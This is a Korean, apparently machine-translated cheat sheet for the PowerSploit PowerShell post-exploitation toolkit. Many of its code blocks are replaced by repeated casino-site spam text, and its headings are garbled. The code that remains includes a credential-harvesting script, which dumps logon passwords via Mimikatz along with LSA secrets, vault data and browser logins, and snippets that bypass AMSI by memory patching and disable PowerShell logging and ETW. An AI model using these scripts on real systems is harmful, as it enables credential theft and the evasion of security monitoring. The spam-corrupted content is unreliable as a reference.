콘텐츠로 이동

PowerSploit 열 시트

제품정보

PowerSploit는 Microsoft PowerShell 모듈의 컬렉션으로, 모든 단계의 평가에서 aid 침투 테스터에 사용할 수 있습니다. PowerSploit는 다음과 같은 모듈로 구성되어 있습니다. CodeExecution, ScriptModification, Persistence, AntivirusBypass, Exfiltration, Mayhem, Privesc 및 Recon. 각 단위는 포스트 폭발 활동을 위한 각종 기능을 제공하는 몇몇 기능을 포함합니다.

· Warning: PowerSploit만 사용하거나 테스트할 수 있는 명시적인 권한이 있습니다. 무단 사용은 서비스 또는 지역 법률에 위반할 수 있습니다.

설치하기

GitHub에서 다운로드

카지노사이트

Git 복제

카지노사이트

수입 모듈

카지노사이트

Bypass 실행 정책

카지노사이트

Recon 단위

PowerView 기능

카지노사이트

고급 PowerView 쿼리

카지노사이트

세션 및 로컬 Admin Enumeration

카지노사이트

ACL 및 권한

카지노사이트

Privesc 모듈 (PowerUp)

기본 특전

카지노사이트

서비스 Exploitation

카지노사이트

사이트맵 채용 정보

ο 회원 관리

레지스트리 폭발

카지노사이트

Persistence 단위

등록 관리

카지노사이트

WMI 지속

카지노사이트

사용자 Hunting

카지노사이트

코드Execution 모듈

DLL 주입

카지노사이트

메모리 실행

카지노사이트

Exfiltration 모듈

자료 Exfiltration

카지노사이트

Credential 수확

카지노사이트

AntivirusBypass 모듈

AV 증발

오프화이트

엠에디터 플러그 인 참조:ScriptModification 모듈

스크립트 Obfuscation

카지노사이트

Mayhem 단위

시스템 Disruption

오프화이트

고급 기술

채용정보

카지노사이트

ASREP로스팅

카지노사이트

골든 티켓 공격

카지노사이트

실버 티켓 공격

카지노사이트

DCSync 공격

카지노사이트

자동화 스크립트

도메인 Enumeration 스크립트

카지노사이트

Privilege 확장 본문 바로가기

```powershell

!/usr/bin/env powershell

PowerSploit Privilege Escalation Check

param( [string]$OutputFile = "C:\temp\privesc_results.txt" )

Import PowerUp

Import-Module .\Privesc\PowerUp.ps1

Write-Host "[+] Starting privilege escalation checks..."

try \\{ # Run all checks and save to file Invoke-AllChecks|Tee-Object -FilePath $OutputFile

Write-Host "[+] Privilege escalation checks completed"
Write-Host "[+] Results saved to: $OutputFile"

# Check for immediate wins
$results = Get-Content $OutputFile

if ($results -match "Unquoted Service Path") \\\\{
    Write-Host "[!] FOUND: Unquoted service paths - potential privilege escalation!"
\\\\}

if ($results -match "Modifiable Service") \\\\{
    Write-Host "[!] FOUND: Modifiable services - potential privilege escalation!"
\\\\}

if ($results -match "AlwaysInstallElevated") \\\\{
    Write-Host "[!] FOUND: AlwaysInstallElevated enabled - potential privilege escalation!"
\\\\}

\\} catch \\{ Write-Error "[-] Privilege escalation checks failed: $($_.Exception.Message)" \\} ```의 경우

Credential Harvesting 스크립트

```powershell

!/usr/bin/env powershell

PowerSploit Credential Harvesting Script

param( [string]$OutputDir = "C:\temp\creds" )

Create output directory

if (!(Test-Path $OutputDir)) \\{ New-Item -ItemType Directory -Path $OutputDir -Force \\}

Import modules

Import-Module .\Exfiltration\Exfiltration.psd1 Import-Module .\CodeExecution\CodeExecution.psd1

Write-Host "[+] Starting credential harvesting..."

try \\{ # Mimikatz - dump credentials Write-Host "[+] Running Mimikatz..." Invoke-Mimikatz -Command "sekurlsa::logonpasswords"|Out-File "$OutputDir\logonpasswords.txt" Invoke-Mimikatz -Command "sekurlsa::wdigest"|Out-File "$OutputDir\wdigest.txt" Invoke-Mimikatz -Command "sekurlsa::kerberos"|Out-File "$OutputDir\kerberos.txt" Invoke-Mimikatz -Command "sekurlsa::tspkg"|Out-File "$OutputDir\tspkg.txt"

# Registry secrets
Write-Host "[+] Extracting registry secrets..."
Get-LSASecret|Out-File "$OutputDir\lsa_secrets.txt"
Get-CachedGPPPassword|Out-File "$OutputDir\gpp_passwords.txt"

# Vault credentials
Write-Host "[+] Extracting vault credentials..."
Get-VaultCredential|Out-File "$OutputDir\vault_creds.txt"

# Browser credentials
Write-Host "[+] Extracting browser credentials..."
Get-ChromeDump|Out-File "$OutputDir\chrome_creds.txt"
Get-FirefoxDump|Out-File "$OutputDir\firefox_creds.txt"

Write-Host "[+] Credential harvesting completed"
Write-Host "[+] Results saved to: $OutputDir"

\\} catch \\{ Write-Error "[-] Credential harvesting failed: $($_.Exception.Message)" \\} ```에 대하여

Evasion 기술

AMSI 우회

```powershell

Method 1: Reflection

$a = [Ref].Assembly.GetTypes() | $a | ForEach-Object \\{$.GetMethods() | ForEach-Object \\{if($.Name -like "AmsiInitialize") \\{$_.Invoke($null, @($null, 0))\\}\\}\\} |

Method 2: Memory patching

$Win32 = @" using System; using System.Runtime.InteropServices; public class Win32 \\{ [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name); [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); \\} "@

Add-Type $Win32 $LoadLibrary = Win32::LoadLibrary("amsi.dll") $Address = Win32::GetProcAddress($LoadLibrary, "AmsiScanBuffer") $p = 0

$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)

```의 경우

PowerShell 로깅 우회

```powershell

Disable PowerShell logging

$GPO = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings','NonPublic,Static') $GPO.SetValue($null, @\\{\\})

Disable script block logging

$settings = [System.Management.Automation.Utils]::GetGroupPolicySettings() $settings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0 $settings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0 ```에 대하여

기타 패스워드

```powershell

Disable ETW

$Provider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider') $etwProvider = $Provider.GetField('etwProvider','NonPublic,Static').GetValue($null) [System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0) ```의 경우

통합 예제

Cobalt Strike 통합

카지노사이트

Empire 통합

카지노사이트

Metasploit 통합

카지노사이트

문제 해결

실행 정책 문제

카지노사이트

AMSI 탐지

카지노사이트

Module 수입 문제

카지노사이트

네트워크 연결 문제

```powershell

Test network connectivity

Test-NetConnection -ComputerName "target" -Port 445

Check firewall

Get-NetFirewallRule|Where-Object \\{$_.Enabled -eq "True"\\}

Use alternative ports

Get-DomainController -Server "dc.domain.com:389" ```의 경우

지원하다


이 속임수 시트는 Windows 침투 테스트 및 포스트 폭발에 대한 PowerSploit을 사용하는 포괄적 인 참조를 제공합니다. 항상 이 도구를 사용하기 전에 적절한 권한이 있습니다. 필수